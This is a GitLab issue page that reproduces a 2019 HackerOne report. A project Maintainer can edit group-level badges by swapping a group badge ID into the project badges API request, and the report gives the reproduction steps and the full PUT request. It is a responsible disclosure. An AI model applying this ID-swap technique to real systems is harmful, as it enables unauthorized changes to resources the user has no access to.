Skip to content

Project Maintainer can EDIT group badges

HackerOne report #751264 by ashish_r_padelkar on 2019-12-04, assigned to @ankelly:

Summary

Hello,

When user has explicit Maintainer permission on projects but not at group level, such users can still EDIT group level badges.

Steps to reproduce

  1. Add a user at project level as maintainer but don't give any access at group level.
  2. Now login as above user with maintainer role in project
  3. Go to https://gitlab.com/<GroupName>/<ProjectName>/edit and EDIT any of your project level badge. You wont see EDIT button next to group badges as you dont have any permissions to EDIT it.
  4. When you EDIT and save project Badges, you will see below request
PUT /api/v4/projects/15203433/badges/<Badge_ID> HTTP/1.1  
Host: gitlab.com  
Connection: close  
Content-Length: 149  
Accept: application/json, text/plain, */*  
Origin: https://gitlab.com  
X-CSRF-Token: ████  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36  
Content-Type: application/json;charset=UTF-8  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Referer: https://gitlab.com/groupfor1/1projectfor/edit  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: ████

{"name":"CCC","image_url":"https://gitlab.com/%{project_path}/badges/%{default_branch}/pipeline.svg","link_url":"https://gitlab.com/%{project_path}"}
  1. Just change the <Badge_ID> in URL with group badge and send the request PUT /api/v4/projects/15203433/badges/<Badge_ID> HTTP/1.1
  2. This will successfully change the group level badge!

What is the current bug behavior?

Project Maintainer can change group badges without any access to group

What is the expected correct behavior?

Project Maintainer shouldn't be allowed to change group level badges

Output of checks

This bug happens on GitLab.com. Tested on public group private project but it should work for private group private projects too

Regards,
Ashish

Impact

Project Maintainers can change group level badges